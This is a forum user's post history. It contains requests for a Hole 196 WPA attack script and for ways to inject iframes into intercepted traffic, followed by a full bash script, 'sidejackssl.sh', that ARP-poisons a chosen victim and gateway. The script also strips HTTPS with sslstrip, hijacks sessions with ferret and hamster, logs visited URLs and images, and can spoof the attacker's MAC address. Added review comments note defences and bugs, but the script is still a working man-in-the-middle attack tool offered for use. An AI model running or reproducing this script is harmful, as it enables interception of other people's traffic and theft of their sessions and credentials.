
Glynec

Everything posted by Glynec

  1. Is there a ready-made script that implements the Hole 196 attack ( http://www.slideshare.net/MdSohailAhmad/wpa-toohole196defcon18presentation )?
  2. I remember that it had a logo - a blue (or other color) radio antenna with waves (the logo was in ASCII graphics). It's definitely not airoscript-ng. Does anyone remember it?
  3. Inject Iframe. We need stability
  4. Which is the best and most stable option? Ettercap + filters? Squid? Mitmproxy (mitmproxy.org)? Or something else?
  5. #!/bin/bash
# sidejackssl.sh v0.2
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# driftnet for fun
# firefox needs to be configured with a proxy of 127.0.0.1:1234
# url for hamster server is http://hamster
# by gorara
#
# Summary: parses -i/-t/-g/-r, optionally randomizes the interface MAC,
# enables IP forwarding, adds one nat REDIRECT rule, starts each tool in its
# own xterm and then waits. Ctrl-C (or SIGTERM) runs cleanup(), which reverts
# the host-side changes and offers to delete the log files.
#
# Host changes made by this script (useful when reviewing a machine it ran on):
#   - /proc/sys/net/ipv4/ip_forward set to 1
#   - nat PREROUTING rule: tcp dport 80 -> REDIRECT to local port 10000
#   - with -r: interface MAC changed through macchanger
#   - files written under $temp and in the current directory
#
# NOTE(review): what the traffic redirection depends on, seen from the
# defending side: the target's ARP entry for the gateway must be rewritable
# (static ARP entries, or dynamic ARP inspection on the switch, prevent that;
# ARP-table monitoring such as arpwatch reports the change), and only
# connections that start as plain HTTP on port 80 are redirected, so sites
# enforced through HSTS and cookies flagged Secure do not travel that path.

# a few variables (do not change)
m1="0" # missing file var m1
m2="0" # missing file var m2
m3="0" # missing file var m3
m4="0" # missing file var m4
quickclean="0" # used for quick clean up
randmac="n" # default setting do not randomize MAC
hamsterfile="hamster.txt" # hamster output file (you can't change it)
trap 'cleanup' SIGINT SIGTERM # detect control-c (SIGTERM is handled the same way)

# a few more variables (change these if required)
# xterm window variables
x="0" # x offset value
y="0" # y offset value
width="120" # width value
height="7" # height value
yoffset="120" # y offset
fgcolor="white" # foreground color
bgcolor="black" # background color

# style variables
warnstyle="[\e[01;38mw\e[00m]" # warning msgs style
execstyle="[\e[01;32mx\e[00m]" # execute msgs style
infostyle="[\e[01;34mi\e[00m]" # informational msgs style
inputstyle="[\e[01;30m?\e[00m]" # input msgs style

# file variables
sslstripfile="sslstrip.log" # sslstrip output file name
snifffile="sniff-*" # hamster sniff file wildcard
etterfile="etter.cap" # ettercap output cap file
# NOTE(review): the header says the script runs as root, and it writes fixed
# file names (mac.orig, gw.orig, $sslstripfile) under this directory. In a
# world-writable /tmp a pre-created symlink at one of those paths would be
# followed; a private directory from `mktemp -d` would avoid that.
temp="/tmp" # temporary dir

# Print the help text and exit with status 0.
function usage {
  clear
  echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
  echo ""
  echo " -i interface interface to use, ex. eth0, wlan0."
  echo " -t target the target IP address."
  echo " -g gateway the gateway IP address."
  echo " -r randomize your MAC address,"
  echo " only use for wired interfaces."
  echo " -h display this help screen."
  echo ""
  echo " examples: "
  echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
  echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
  echo ""
  exit 0
}

# Signal handler for SIGINT/SIGTERM: reverts the host changes made by the main
# program, lists the log files that exist, asks whether to delete them, and
# exits 0.
# Globals read: quickclean, randmac, origmac, interface, gw, temp,
#               sslstripfile, etterfile, snifffile, hamsterfile
# Globals written: m1..m4, delete, delete_marker
function cleanup() {
  echo -e "\n$warnstyle control-c pressed! "
  # exit script if nothing has been modified
  if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
  fi
  echo -e "$infostyle cleaning up..."
  echo -e "$execstyle flushing iptables..."
  # These two calls flush every chain of the filter and nat tables, not only
  # the PREROUTING rule this script added; rules the host had before the run
  # are removed as well.
  iptables -F
  iptables -t nat -F
  echo -e "$execstyle turning off IP forwarding..."
  # Forwarding is switched off unconditionally; the value it had before the
  # script ran is never saved, so a host that was routing stops routing.
  echo "0" > /proc/sys/net/ipv4/ip_forward
  # change back MAC address to original one
  # (randmac is only ever set to "n" or "y" in this file; the "Y" test never matches)
  if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    # $gw is unquoted: when it is empty the test collapses to `[ -z ]`, which
    # is true, so the warning branch is still taken.
    if [ -z $gw ]; then
      echo -e "$warnstyle WARNING, you have no default gateway!"
    else
      # taking the interface down dropped the default route; put it back
      route add default gw $gw
    fi
    rm $temp/mac.orig
    rm $temp/gw.orig
  fi
  echo -e "$execstyle cleaning up files..."
  echo -e "$infostyle temp directory: "
  # testing to see if files exist, if so display them...
  # m1..m4 are set to "1" for each file that is missing.
  if [ -f $temp/$sslstripfile ]; then
    ls $temp/$sslstripfile
  else
    #echo -e "$warnstyle missing $sslstripfile"
    m1="1"
  fi
  if [ -f $temp/$etterfile ]; then
    ls $temp/$etterfile
  else
    #echo -e "$warnstyle missing $etterfile"
    m2="1"
  fi
  echo -e "$infostyle current directory: "
  # $snifffile holds the glob "sniff-*" and is expanded unquoted here. With
  # more than one match `[ -f ... ]` gets too many arguments and fails, so the
  # files are then treated as missing.
  if [ -f $snifffile ]; then
    ls $snifffile
  else
    #echo -e "$warnstyle missing $snifffile"
    m3="1"
  fi
  if [ -f $hamsterfile ]; then
    ls $hamsterfile
  else
    #echo -e "$warnstyle missing $hamsterfile"
    m4="1"
  fi
  # testing to see if there are any files at all
  if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    # The loop condition is a command list: the [[ ]] test (always true, a
    # value cannot equal both "y" and "n"), the prompt, and `read`. Only the
    # status of `read` decides whether the body runs; the loop ends through
    # `break` or when read fails.
    while [[ "$delete" != "y" || "$delete" != "n" ]]
      echo -en "$infostyle delete file(s)? [y/n]: "
      read delete
    do
      case "$delete" in
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
        n) echo -e "$warnstyle nothing deleted!"; break;;
        *) echo -e "$warnstyle wrong selection!";
      esac
    done
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
      if [ -f $temp/$sslstripfile ]; then
        rm $temp/$sslstripfile
      fi
      if [ -f $temp/$etterfile ]; then
        rm $temp/$etterfile
      fi
      if [ -f $snifffile ]; then
        rm $snifffile
      fi
      if [ -f $hamsterfile ]; then
        rm $hamsterfile
      fi
    fi
  else
    echo -e "$warnstyle nothing to delete!"
  fi
  echo -e "$infostyle all done!"
  exit 0
}

# start main program
if [ "$#" -eq 0 ]; then
  usage
fi
# Hand-rolled option parsing: each value-taking arm shifts once and the
# trailing `shift` consumes the value. -r takes no value but shifts as well,
# so the argument that follows -r is skipped.
while [ "$#" -gt 0 ]
do
  case "$1" in
    -i) interface=$2; shift 1;;
    -r) randmac="y"; shift 1;;
    -t) target=$2; shift 1;;
    -g) gateway=$2; shift 1;;
    -h) usage;;
    -*) usage; break;;
    *) break;;
  esac
  shift
done
# required parameters
# The values are only checked for being non-empty; nothing validates that they
# are an interface name or IP addresses before they reach the commands below
# unquoted.
if [[ -z $interface || -z $target || -z $gateway ]]; then
  usage
  exit 0
fi
clear
if [[ "$randmac" = "y" ]]; then
  mac="yes"
else
  mac="no"
fi
# set quick cleanup flag
# (while it is "1", cleanup() returns early because no host state has changed yet)
quickclean="1"
echo -e "$infostyle sidejacker/sslstrip script v0.2, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
if [[ "$randmac" = "y" ]]; then
  echo -e "$execstyle change of $interface MAC address requested."
  # The interface type is guessed from the name prefix only.
  if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..."
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
  fi
  if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..."
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    if [[ "$continue" = "y" ]]; then
      echo -e "$infostyle proceeding..."
    else
      echo -e "$infostyle exiting..."
      exit 0
    fi
  fi
  # First capture of the current MAC; it is overwritten further down with the
  # value parsed from macchanger's output.
  origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
fi
# before this, ctrl-c will exit script without doing anything.
quickclean="0"
# use macchanger to randomize MAC address, etc.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
  echo -e "$execstyle randomizing MAC address...";
  # The redirection belongs to the assignment, which prints nothing, so
  # gw.orig is created empty; the gateway address is kept in $gw only.
  gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
  ifconfig $interface down
  macchanger -r $interface > $temp/mac.orig
  ifconfig $interface up
  if [ -z $gw ]; then
    echo -e "$warnstyle WARNING, you have no default gateway!"
  else
    route add default gw $gw
  fi
  origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
  fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
  echo -e "$infostyle original MAC is: $origmac"
  echo -e "$infostyle faked MAC is: $fakemac"
fi
echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "$execstyle configuring iptables..."
# Only TCP port 80 is redirected to local port 10000. No listen port is passed
# to sslstrip below, so this presumably matches its default (confirm).
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sleep 1
# Each tool below runs in its own background xterm, stacked vertically by
# adding $yoffset to $y before every launch. cleanup() never kills or waits on
# these windows.
# NOTE(review): they presumably end because Ctrl-C reaches the whole foreground
# process group. Confirm, since a SIGTERM sent to the script alone would leave
# them running.
echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2
echo -e "$execstyle starting ferret ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2
echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -a -k -f -w $temp/$sslstripfile &
sleep 2
echo -e "$execstyle starting ettercap ... <logging to: console>"
y=$(($y+$yoffset))
# No output-file option is passed here, so $temp/$etterfile is presumably
# never created by this script (confirm); cleanup() still checks for it.
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface &
sleep 2
echo -e "$execstyle starting urlsnarf ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2
echo -e "$execstyle starting driftnet ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "driftnet" -e driftnet -p -i $interface &
sleep 2
echo -e "$infostyle trap is ready, now to direct traffic..."
echo -e "$execstyle ARP poisoning the target..."
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1
echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
# Idle loop: the script only leaves here through the SIGINT/SIGTERM trap,
# so the `exit 0` after the loop is not reached.
for ((;;))
do
  read loop
  echo -en "$infostyle press ctrl-c to terminate!"
done
exit 0

Powered by bt4 - does not work on bt5 (((